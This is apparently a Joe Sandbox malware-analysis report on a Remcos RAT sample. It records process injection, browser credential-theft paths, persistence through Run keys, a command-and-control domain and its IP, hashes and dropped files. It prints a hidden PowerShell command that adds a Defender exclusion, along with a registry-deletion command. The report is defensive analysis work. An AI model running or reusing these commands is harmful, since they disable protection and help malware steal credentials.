Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 920000	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 930000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: 690000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: 6A0000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: 6B0000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: 6C0000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: 610000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: 620000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: 630000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: 640000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: 10590000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: AF0000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: B80000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: B90000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: BA0000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: BB0000	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 10590000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 600000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 690000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 6A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 6B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 6C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 610000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 620000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 630000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 640000 protect: page execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10590000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Memory written: C:\Windows\SysWOW64\dialer.exe base: 10590000 value starts with: 4D5A			Jump to behavior

Contains functionality to inject code into remote processes

Show sources

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_0041412B CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,

7_2_0041412B

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 8D0000	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 990000	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 910000	Jump to behavior
Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 930000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Thread created: C:\Windows\SysWOW64\dialer.exe EIP: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Thread created: C:\Windows\SysWOW64\dialer.exe EIP: 6C0000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Thread created: C:\Windows\SysWOW64\dialer.exe EIP: 640000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Thread created: C:\Windows\SysWOW64\dialer.exe EIP: AF0000	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Thread created: C:\Windows\SysWOW64\dialer.exe EIP: BB0000	Jump to behavior

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe

7_2_0040FAC7

Source: C:\Users\user\Desktop\IQl00lxPjo.exe	Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Process created: C:\Windows\SysWOW64\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Dsqbhgvf.exe	Process created: C:\Windows\SysWOW64\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_00414F84 StrToIntA,mouse_event,

7_2_00414F84

Source: DpiScaling.exe, 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp	Binary or memory string: Program Manager#
Source: DpiScaling.exe, 00000007.00000000.726232546.00000000032B0000.00000002.00020000.sdmp, dialer.exe, 00000019.00000000.915462595.0000000002F60000.00000002.00020000.sdmp, dialer.exe, 0000001A.00000002.926676761.0000000003330000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: DpiScaling.exe, 00000007.00000000.726232546.00000000032B0000.00000002.00020000.sdmp, dialer.exe, 00000019.00000000.915462595.0000000002F60000.00000002.00020000.sdmp, dialer.exe, 0000001A.00000002.926676761.0000000003330000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: DpiScaling.exe, 00000007.00000000.726232546.00000000032B0000.00000002.00020000.sdmp, dialer.exe, 00000019.00000000.915462595.0000000002F60000.00000002.00020000.sdmp, dialer.exe, 0000001A.00000002.926676761.0000000003330000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: DpiScaling.exe, 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp	Binary or memory string: Program Manager-
Source: DpiScaling.exe, 00000007.00000000.726232546.00000000032B0000.00000002.00020000.sdmp, dialer.exe, 00000019.00000000.915462595.0000000002F60000.00000002.00020000.sdmp, dialer.exe, 0000001A.00000002.926676761.0000000003330000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: DpiScaling.exe, 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp	Binary or memory string: \|Program Manager\|
Source: DpiScaling.exe, 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp	Binary or memory string: Program Manager{
Source: DpiScaling.exe, 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp	Binary or memory string: Program Manager<

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: EnumSystemLocalesW,	7_2_0044A1D0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: GetLocaleInfoA,	7_2_0040D1E5
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: EnumSystemLocalesW,	7_2_0044A21B
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: EnumSystemLocalesW,	7_2_0044A2B6
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	7_2_0044A343
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: GetLocaleInfoW,	7_2_004423BA
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: GetLocaleInfoW,	7_2_0044A593
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_0044A6BC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: GetLocaleInfoW,	7_2_0044A7C3
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	7_2_0044A890
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: EnumSystemLocalesW,	7_2_00441ED1
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	7_2_00449F58
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: GetLocaleInfoW,	7_2_105D3228
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: EnumSystemLocalesW,	7_2_105D2D3F

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_0042F9B4 cpuid

7_2_0042F9B4

Source: C:\Windows\SysWOW64\DpiScaling.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_00404E9A GetLocalTime,CreateEventA,CreateThread,

7_2_00404E9A

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_00442C8E _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

7_2_00442C8E

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_00416D9E GetComputerNameExW,GetUserNameW,

7_2_00416D9E

Stealing of Sensitive Information:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 7.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.10591a6e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.10591a6e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DpiScaling.exe PID: 3980, type: MEMORYSTR

Contains functionality to steal Firefox passwords or cookies

Show sources

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		7_2_0040A012
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: \key3.db		7_2_0040A012

Contains functionality to steal Chrome passwords or cookies

Show sources

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

7_2_00409EF4

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 7.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.10591a6e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.10591a6e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DpiScaling.exe PID: 3980, type: MEMORYSTR

Detected Remcos RAT

Show sources

Source: DpiScaling.exe	String found in binary or memory: Remcos_Mutex_Inj
Source: DpiScaling.exe, 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp	String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov\|

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: cmd.exe

7_2_004055EA

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Windows Service1	Access Token Manipulation1	Scripting1	Input Capture111	Account Discovery1	Remote Desktop Protocol	Input Capture111	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Defacement1
Domain Accounts	Command and Scripting Interpreter1	Registry Run Keys / Startup Folder1	Windows Service1	Obfuscated Files or Information2	Credentials In Files2	System Service Discovery1	SMB/Windows Admin Shares	Clipboard Data2	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Service Execution2	Logon Script (Mac)	Process Injection522	Software Packing1	NTDS	File and Directory Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder1	Masquerading1	LSA Secrets	System Information Discovery33	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Modify Registry1	Cached Domain Credentials	Security Software Discovery121	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol11	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion1	DCSync	Virtualization/Sandbox Evasion1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Process Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection522	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
IQl00lxPjo.exe	32%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\Libraries\Dsqbhgvf.exe	32%	Virustotal		Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Download
7.0.DpiScaling.exe.10590000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
7.0.DpiScaling.exe.10590000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
7.2.DpiScaling.exe.10590000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
7.0.DpiScaling.exe.10590000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
7.2.DpiScaling.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1141389	Download File
7.0.DpiScaling.exe.10590000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
twistednerd.dvrlists.com	10%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
twistednerd.dvrlists.com	10%	Virustotal		Browse
twistednerd.dvrlists.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
twistednerd.dvrlists.com	31.3.152.100	true	true	10%, Virustotal, Browse	unknown
onedrive.live.com	unknown	unknown	false		high
qclvzw.sn.files.1drv.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
twistednerd.dvrlists.com	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
31.3.152.100	twistednerd.dvrlists.com	Sweden		51430	ALTUSNL	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	484282
Start date:	16.09.2021
Start time:	07:30:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	IQl00lxPjo (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@23/10@7/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 32.2% (good quality ratio 31.3%) Quality average: 84.8% Quality standard deviation: 23.8%
HCA Information:	Successful, ratio: 98% Number of executed functions: 40 Number of non-executed functions: 257
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220, 13.107.42.13, 13.107.42.12, 20.82.209.183, 23.55.161.164, 23.55.161.162, 23.55.161.142, 23.55.161.160, 20.54.110.249, 40.112.88.60, 23.216.77.209, 23.216.77.208, 20.50.102.62 Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, l-0004.l-msedge.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, odc-sn-files-geo.onedrive.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:31:30	API Interceptor	2x Sleep call for process: IQl00lxPjo.exe modified
07:31:36	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Dsqbhgvf C:\Users\Public\Libraries\fvghbqsD.url
07:31:45	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Dsqbhgvf C:\Users\Public\Libraries\fvghbqsD.url
07:32:57	API Interceptor	2x Sleep call for process: Dsqbhgvf.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
twistednerd.dvrlists.com	Eoo91zh29a.exe	Get hash	malicious	Browse	62.102.148.152
	Electronic Payment Advice.xls	Get hash	malicious	Browse	62.102.148.152
	tVjDMtlqb9.exe	Get hash	malicious	Browse	62.102.148.152
	aWJOIbEUw4.exe	Get hash	malicious	Browse	62.102.148.152
	4R9z1vVrUf.exe	Get hash	malicious	Browse	62.102.148.152
	Rv9kLjPu17.exe	Get hash	malicious	Browse	62.102.148.152
	JG335Ko0Jt.exe	Get hash	malicious	Browse	62.102.148.152
	QJuq3fap2K.exe	Get hash	malicious	Browse	62.102.148.152
	xBNJLAeaki.exe	Get hash	malicious	Browse	62.102.148.130
	bank.exe	Get hash	malicious	Browse	62.102.148.130
	clip.exe	Get hash	malicious	Browse	185.189.112.27
	micro.exe	Get hash	malicious	Browse	185.189.112.27
	credit.exe	Get hash	malicious	Browse	185.189.112.27
	SecuriteInfo.com.VHO.Backdoor.Win32.Convagent.gen.1206.exe	Get hash	malicious	Browse	213.152.187.215
	BoFA Remittance Advice-2021207.exe	Get hash	malicious	Browse	213.152.187.215
	file2.exe	Get hash	malicious	Browse	141.98.102.243

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ALTUSNL	PDF.FILE#1145523.vbs	Get hash	malicious	Browse	206.123.147.48
	YINFFTpCA4.exe	Get hash	malicious	Browse	79.142.76.244
	Instruction copy.exe	Get hash	malicious	Browse	213.5.70.58
	XoN2GgRiga.exe	Get hash	malicious	Browse	128.127.105.184
	28lvYsFGLl.exe	Get hash	malicious	Browse	128.127.105.184
	DECL G50 EURL.xlsx	Get hash	malicious	Browse	128.127.105.184
	byodInstCL.exe	Get hash	malicious	Browse	79.142.69.9
	x4xlPw0K93.exe	Get hash	malicious	Browse	79.142.76.244
	faktura #696498.xlsx	Get hash	malicious	Browse	79.142.76.244
	0DySn8eZVx.exe	Get hash	malicious	Browse	79.142.66.239
	LdmcHfRWKM.exe	Get hash	malicious	Browse	79.142.66.239
	bkCtR51L3O.exe	Get hash	malicious	Browse	79.142.73.155
	JUSTIFICANTE TRANSFERENCIA.xlsx	Get hash	malicious	Browse	79.142.73.155
	7Frr8Rl49L.exe	Get hash	malicious	Browse	185.10.56.4

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\Public\KDECO.bat Download File
Process:	C:\Users\user\Desktop\IQl00lxPjo.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	155
Entropy (8bit):	4.687076340713226
Encrypted:	false
SSDEEP:	3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
MD5:	213C60ADF1C9EF88DC3C9B2D579959D2
SHA1:	E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
SHA-256:	37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
SHA-512:	FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
Malicious:	false
Preview:	start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit

C:\Users\Public\Libraries\Dsqbhgvf.exe Download File
Process:	C:\Users\user\Desktop\IQl00lxPjo.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	811520
Entropy (8bit):	6.67407039380249
Encrypted:	false
SSDEEP:	24576:W0WE0AyOVWoKcwdZHGIZHrIzvlZwXI7Dyj3SaH+MJu:W0WEoQhudZS
MD5:	9B8AE8EDFE553EDEA6108DCEEBCC57B8
SHA1:	EAE4825368E0ED56DB5484012303ADD569CB98E9
SHA-256:	D79BA47A55B5DCB4CF6E76AC13BD3179E1523D5904483232D9CE9D39915DBC69
SHA-512:	5F357814E91904F33B878691F143B34139FD445E1651DAE8A9825CA4B43710DDF8D2EC32D9F9893D6E93B93259B2AC19D0587FE4AA1B5A4987C064E793B12658
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 32%, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................\......(........ ....@..............................................@...........................P..,$..............................8n..................................................................................CODE................................ ..`DATA......... ......................@...BSS..........@...........................idata..,$...P...&..................@....tls.................@...................rdata...............@..............@..P.reloc..8n.......p...B..............@..P.rsrc...............................@..P.....................b..............@..P........................................................................................................................................

C:\Users\Public\Libraries\fvghbqsD.url Download File
Process:	C:\Users\user\Desktop\IQl00lxPjo.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Dsqbhgvf.exe">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.898248914259409
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMdHNBZsGKd5ov:HRYFVmTWDyz0HNBZsb5y
MD5:	145ACDC90EC748C2BFED3F1698E06966
SHA1:	CFE41ED0690E729683A35DE0F0A467FEC5ABF3DC
SHA-256:	7633C8D879C6E3F9549C23640B0571AD58457D4A110F6BCD15CB379DB1DFEE3C
SHA-512:	7A13B4E4EF67F2598F13B8B5FBEAF075324BC07F44105743FC42839086F79F57BA46DC2B8441DCA7C0CE80D75ABD08BA618B6669217A94FA29419F2178F64119
Malicious:	false
